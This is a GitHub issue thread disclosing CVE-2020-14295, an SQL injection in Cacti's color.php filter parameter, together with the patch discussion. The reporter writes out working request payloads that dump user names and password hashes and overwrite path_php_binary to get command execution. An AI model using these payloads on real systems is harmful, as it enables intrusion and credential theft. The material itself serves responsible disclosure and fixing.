CVE-2020-14295: SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295) · Issue #3622 · Cacti/cacti

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Mayfly277 opened this issue

Jun 17, 2020

· 13 comments

Comments

sqli as admin v1.2.12

There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.

To Reproduce

Steps to reproduce the behavior:

call /cacti/color.php?action=export&header=false&filter=’)<SQLI HERE>–±

Expected behavior

change the following lines :

$sql_where = “WHERE (name LIKE '%” . get_request_var(‘filter’) . "%’

    /* form the 'where' clause for our main sql query */
    if (get_request_var('filter') != '') {
        $sql_where = "WHERE (name LIKE '%" . get_request_var('filter') . "%'
            OR hex LIKE '%" .  get_request_var('filter') . "%')";
    } else {
        $sql_where = '';
}

You should do db_qstr(‘%’ . get_request_var(‘filter’) . ‘%’) instead of '%" . get_request_var(‘filter’) . "%.

Additional context

• As the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database.

  GET /cacti/color.php?action=export&header=false&filter=1’)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=’touch+/tmp/sqli_from_rce;’+where+name=’path_php_binary’;–±

• Then call host.php?action=reindex and get the shell_exec called with the path_php_binary.

Not sure if that was already covered in our current CVE tracker. Have you tested against the very latest 1.2.x branch ?

I tried with that image which use the latest release : quantumobject/docker-cacti
And the request :

/cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;-- -`

Is getting back the users and hash.

The code on this function haven’t change in 3 years:

But the filter change 11 months ago and that change bring the issue.

• The actual code (1.12.x branch):

• before the issue Non regular expression search filters don’t support international characters #2839 fix the code (v1.2.6) seems to be not vulnerable :

This was resolved some time ago in the 1.2.x branch.

This was resolved some time ago in the 1.2.x branch.

Would you have a commit reference int the 1.2.x branch which is fixing the issue?

No this is NOT fixed.
I just tried with a fresh checkout of 1.2.x. and the exploit still work.
Please reopen @TheWitness

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Thanks for verifying. And supplying a patch. Could you add the CVE number to the changelog ?

You have to be reviewing something other than the 1.2.x branch. Here is a screen capture of the 1.2.x branch. Tell me which part of this does not conform to your reasoning?

@Mayfly277, after re-reading, I think you are confused. It’s "git clone -b 1.2.x …". It’s not "branch 1.12.x, it’s 1.2.x.

I’ll be damned. Where did that come from. Re-opening. Thanks for being persistent.

From Code: color.php always process filter by function sanitize_search_string.
And sanitize_search_string will drop char ', , ; and )`.
Why your env can get SQL result.

In my test, final SQL like SQL below, all invalid char is dropped, and injection SQL around with single quot:

SELECT *, SUM(CASE WHEN local_graph_id>0 THEN 1 ELSE 0 END) AS graphs, SUM(CASE WHEN local_graph_id=0 THEN 1 ELSE 0 END) AS templates FROM ( SELECT c.*, local_graph_id FROM colors AS c LEFT JOIN ( SELECT color_id, graph_template_id, local_graph_id FROM graph_templates_item WHERE color_id>0 ) AS gti ON c.id=gti.color_id ) AS rs WHERE (name LIKE ‘%1 UNION SELECT 1 username password 4 5 6 7 from user_auth %’ OR hex LIKE ‘%1 UNION SELECT 1 username password 4 5 6 7 from user_auth %’) AND read_only=’on’ GROUP BY rs.id

netniV changed the title [security] sqli as admin SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)

Jul 12, 2020